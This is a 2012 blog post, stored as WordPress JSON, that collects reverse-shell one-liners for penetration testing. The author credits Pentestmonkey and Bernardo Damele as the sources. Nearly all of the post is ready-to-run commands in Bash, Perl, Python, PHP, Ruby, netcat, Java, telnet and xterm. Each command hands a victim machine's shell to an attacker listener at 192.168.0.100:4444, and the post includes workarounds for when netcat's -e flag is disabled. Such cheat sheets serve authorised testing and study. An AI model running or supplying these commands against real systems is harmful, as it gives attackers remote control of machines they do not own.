{"id":380,"date":"2012-02-05T22:07:32","date_gmt":"2012-02-05T21:07:32","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=380"},"modified":"2012-02-05T22:07:32","modified_gmt":"2012-02-05T21:07:32","slug":"reverse-shell-cheat-sheet","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2012\/02\/05\/reverse-shell-cheat-sheet\/","title":{"rendered":"Reverse Shell Cheat Sheet"},"content":{"rendered":"<p>There are many pages on the web documenting quick reverse shell one liners. <a href=\"http:\/\/pentestmonkey.net\/cheat-sheet\/shells\/reverse-shell-cheat-sheet\" target=\"_blank\">Pentestmonkey<\/a> and <a href=\"http:\/\/bernardodamele.blogspot.com\/2011\/09\/reverse-shells-one-liners.html\" target=\"_blank\">Bernardo Damele<\/a> have both created a good few posts between them but I wanted to recapture what they&#8217;ve got for my notes purposes. (It&#8217;s easier for me to find stuff if it&#8217;s in one place). All credit goes to both of those guys where I got all this info from.<\/p>\n<p><strong>Step one<\/strong> &#8211; Set up your listener.<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\">nc <span class=\"re5\">-l<\/span> <span class=\"re5\">-v<\/span> attackerip <span class=\"nu0\">4444<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>In all these examples the attacker IP will be 192.168.0.100<\/p>\n<p><strong>Bash<\/strong><\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"kw3\">exec<\/span> <span class=\"nu0\">5<\/span><span class=\"sy0\">&lt;&gt;\/<\/span>dev<span class=\"sy0\">\/<\/span>tcp<span class=\"sy0\">\/<\/span>192.168.0.100<span class=\"sy0\">\/<\/span><span class=\"nu0\">4444<\/span><br \/>\n<span class=\"kw2\">cat<\/span> <span class=\"sy0\">&lt;&amp;<\/span><span class=\"nu0\">5<\/span> <span class=\"sy0\">|<\/span> <span class=\"kw1\">while<\/span> <span class=\"kw2\">read<\/span> line; <span class=\"kw1\">do<\/span> <span class=\"re1\">$line<\/span> <span class=\"nu0\">2<\/span><span class=\"sy0\">&gt;&amp;<\/span><span class=\"nu0\">5<\/span> <span class=\"sy0\">&gt;&amp;<\/span><span class=\"nu0\">5<\/span>; <span class=\"kw1\">done<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"nu0\">0<\/span><span class=\"sy0\">&lt;&amp;<\/span><span class=\"nu0\">196<\/span>;<span class=\"kw3\">exec<\/span> <span class=\"nu0\">196<\/span><span class=\"sy0\">&lt;&gt;\/<\/span>dev<span class=\"sy0\">\/<\/span>tcp<span class=\"sy0\">\/<\/span>192.168.0.100<span class=\"sy0\">\/<\/span><span class=\"nu0\">4444<\/span>; <span class=\"kw2\">sh<\/span> <span class=\"sy0\">&lt;&amp;<\/span><span class=\"nu0\">196<\/span> <span class=\"sy0\">&gt;&amp;<\/span><span class=\"nu0\">196<\/span> <span class=\"nu0\">2<\/span><span class=\"sy0\">&gt;&amp;<\/span><span class=\"nu0\">196<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"kw2\">bash<\/span> <span class=\"re5\">-i<\/span> <span class=\"sy0\">&gt;&amp;<\/span> <span class=\"sy0\">\/<\/span>dev<span class=\"sy0\">\/<\/span>tcp<span class=\"sy0\">\/<\/span>192.168.0.100<span class=\"sy0\">\/<\/span><span class=\"nu0\">4444<\/span> <span class=\"nu0\">0<\/span><span class=\"sy0\">&gt;&amp;<\/span><span class=\"nu0\">1<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><strong>Perl<\/strong><\/p>\n<div class=\"codecolorer-container perl vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"perl codecolorer\">perl <span class=\"sy0\">-<\/span>e <span class=\"st_h\">'use socket;$i=&quot;192.168.0.100&quot;;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;\/bin\/sh -i&quot;);};'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<div class=\"codecolorer-container perl vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"perl codecolorer\">perl <span class=\"sy0\">-<\/span>MIO <span class=\"sy0\">-<\/span>e <span class=\"st_h\">'$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,&quot;192.168.0.100:4444&quot;);STDIN-&gt;fdopen($c,r);$~-&gt;fdopen($c,w);system$_ while&lt;&gt;;'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>For windows based systems you can use<\/p>\n<div class=\"codecolorer-container perl vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"perl codecolorer\">perl <span class=\"sy0\">-<\/span>MIO <span class=\"sy0\">-<\/span>e <span class=\"st_h\">'$c=new IO::Socket::INET(PeerAddr,&quot;192.168.0.100:4444&quot;);STDIN-&gt;fdopen($c,r);$~-&gt;fdopen($c,w);system$_ while&lt;&gt;;'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><strong>Python<\/strong><\/p>\n<div class=\"codecolorer-container python vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"python codecolorer\">python -c <span class=\"st0\">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;192.168.0.100&quot;,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;\/bin\/sh&quot;,&quot;-i&quot;]);'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><strong>PHP<\/strong><\/p>\n<div class=\"codecolorer-container php vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"php codecolorer\">php <span class=\"sy0\">-<\/span>r <span class=\"st_h\">'$sock=fsockopen(&quot;192.168.0.100&quot;,4444);exec(&quot;\/bin\/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;);'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><strong>Ruby<\/strong><\/p>\n<div class=\"codecolorer-container perl vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"perl codecolorer\">ruby <span class=\"sy0\">-<\/span>rsocket <span class=\"sy0\">-<\/span>e<span class=\"st_h\">'f=TCPSocket.open(&quot;192.168.0.100&quot;,4444).to_i;exec sprintf(&quot;\/bin\/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d&quot;,f,f,f)<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>The following does not need \/bin\/sh:<\/p>\n<div class=\"codecolorer-container perl vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"perl codecolorer\">ruby <span class=\"sy0\">-<\/span>rsocket <span class=\"sy0\">-<\/span>e <span class=\"st_h\">'exit if fork;c=TCPSocket.new(&quot;192.168.0.100&quot;,&quot;4444&quot;);while(cmd=c.gets);IO.popen(cmd,&quot;r&quot;){|io|c.print io.read}end'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>The following is for windows based systems:<\/p>\n<div class=\"codecolorer-container perl vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"perl codecolorer\">ruby <span class=\"sy0\">-<\/span>rsocket <span class=\"sy0\">-<\/span>e <span class=\"st_h\">'c=TCPSocket.new(&quot;192.168.0.100&quot;,&quot;4444&quot;);while(cmd=c.gets);IO.popen(cmd,&quot;r&quot;){|io|c.print io.read}end'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><strong>NetCat<\/strong><\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\">nc <span class=\"re5\">-e<\/span> <span class=\"sy0\">\/<\/span>bin<span class=\"sy0\">\/<\/span><span class=\"kw2\">sh<\/span> 192.168.0.100 <span class=\"nu0\">4444<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\">nc <span class=\"re5\">-c<\/span> <span class=\"sy0\">\/<\/span>bin<span class=\"sy0\">\/<\/span><span class=\"kw2\">sh<\/span> 192.168.0.100 <span class=\"nu0\">4444<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"sy0\">\/<\/span>bin<span class=\"sy0\">\/<\/span><span class=\"kw2\">sh<\/span> <span class=\"sy0\">|<\/span> nc 192.168.0.100 <span class=\"nu0\">4444<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>If the -e flag is disabled you can get around it using the following<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"kw2\">rm<\/span> <span class=\"sy0\">\/<\/span>tmp<span class=\"sy0\">\/<\/span>f;<span class=\"kw2\">mkfifo<\/span> <span class=\"sy0\">\/<\/span>tmp<span class=\"sy0\">\/<\/span>f;<span class=\"kw2\">cat<\/span> <span class=\"sy0\">\/<\/span>tmp<span class=\"sy0\">\/<\/span>f<span class=\"sy0\">|\/<\/span>bin<span class=\"sy0\">\/<\/span><span class=\"kw2\">sh<\/span> <span class=\"re5\">-i<\/span> <span class=\"nu0\">2<\/span><span class=\"sy0\">&gt;&amp;<\/span><span class=\"nu0\">1<\/span><span class=\"sy0\">|<\/span>nc 10.0.0.1 <span class=\"nu0\">1234<\/span> <span class=\"sy0\">&gt;\/<\/span>tmp<span class=\"sy0\">\/<\/span>f<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"kw2\">rm<\/span> <span class=\"re5\">-f<\/span> <span class=\"sy0\">\/<\/span>tmp<span class=\"sy0\">\/<\/span>p; <span class=\"kw2\">mknod<\/span> <span class=\"sy0\">\/<\/span>tmp<span class=\"sy0\">\/<\/span>p p <span class=\"sy0\">&amp;&amp;<\/span> nc attackerip <span class=\"nu0\">4444<\/span> <span class=\"nu0\">0<\/span><span class=\"sy0\">\/<\/span>tmp<span class=\"sy0\">\/<\/span>p<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><strong>Java<\/strong><\/p>\n<div class=\"codecolorer-container java vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/><\/div><\/td><td><div class=\"java codecolorer\">r <span class=\"sy0\">=<\/span> <a href=\"http:\/\/www.google.com\/search?hl=en&amp;q=allinurl%3Adocs.oracle.com+javase+docs+api+runtime\"><span class=\"kw3\">Runtime<\/span><\/a>.<span class=\"me1\">getRuntime<\/span><span class=\"br0\">&#40;<\/span><span class=\"br0\">&#41;<\/span><br \/>\np <span class=\"sy0\">=<\/span> r.<span class=\"me1\">exec<\/span><span class=\"br0\">&#40;<\/span><span class=\"br0\">&#91;<\/span><span class=\"st0\">&quot;\/bin\/bash&quot;<\/span>,<span class=\"st0\">&quot;-c&quot;<\/span>,<span class=\"st0\">&quot;exec 5&lt;&gt;\/dev\/tcp\/192.168.0.100\/4444;cat &lt;&amp;5 | while read line; do <span class=\"es0\">\\$<\/span>line 2&gt;&amp;5 &gt;&amp;5; done&quot;<\/span><span class=\"br0\">&#93;<\/span> as <a href=\"http:\/\/www.google.com\/search?hl=en&amp;q=allinurl%3Adocs.oracle.com+javase+docs+api+string\"><span class=\"kw3\">String<\/span><\/a><span class=\"br0\">&#91;<\/span><span class=\"br0\">&#93;<\/span><span class=\"br0\">&#41;<\/span><br \/>\np.<span class=\"me1\">waitFor<\/span><span class=\"br0\">&#40;<\/span><span class=\"br0\">&#41;<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><strong>Telnet<\/strong><br \/>\nIf netcat is missing (and in most cases you wont have this), then use telnet:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"kw2\">rm<\/span> <span class=\"re5\">-f<\/span> <span class=\"sy0\">\/<\/span>tmp<span class=\"sy0\">\/<\/span>p; <span class=\"kw2\">mknod<\/span> <span class=\"sy0\">\/<\/span>tmp<span class=\"sy0\">\/<\/span>p p <span class=\"sy0\">&amp;&amp;<\/span> telnet 192.168.0.100 <span class=\"nu0\">4444<\/span> <span class=\"nu0\">0<\/span><span class=\"sy0\">\/<\/span>tmp<span class=\"sy0\">\/<\/span>p<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/><\/div><\/td><td><div class=\"bash codecolorer\">telnet 192.168.0.100 <span class=\"nu0\">4444<\/span> <span class=\"sy0\">|<\/span> <span class=\"sy0\">\/<\/span>bin<span class=\"sy0\">\/<\/span><span class=\"kw2\">bash<\/span> <span class=\"sy0\">|<\/span> telnet 192.168.0.100 <span class=\"nu0\">4445<\/span><br \/>\n<span class=\"co0\"># also listen on your machine also on port 4445\/tcp<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><strong>Xterm<\/strong><br \/>\nThis one is a little more tricky, you need to start a listener on the attacker box to catch the incoming xterm<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\">Xnest :<span class=\"nu0\">1<\/span>; xterm <span class=\"re5\">-display<\/span> 127.0.0.1:<span class=\"nu0\">1<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>and then inside the spawned xterm session run this:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"kw2\">xhost<\/span> +victimip<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Then on the victim you need to run this<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\">xterm <span class=\"re5\">-display<\/span> 192.168.0.100:<span class=\"nu0\">1<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n","protected":false},"excerpt":{"rendered":"<p>There are many pages on the web documenting quick reverse shell one liners. Pentestmonkey and Bernardo Damele have both created a good few posts between them but I wanted to recapture what they&#8217;ve got for my notes purposes. (It&#8217;s easier for me to find stuff if it&#8217;s in one place). All credit goes to both [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3,4,1],"tags":[144,142,143,140,141],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/380"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=380"}],"version-history":[{"count":11,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/380\/revisions"}],"predecessor-version":[{"id":391,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/380\/revisions\/391"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=380"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=380"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=380"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}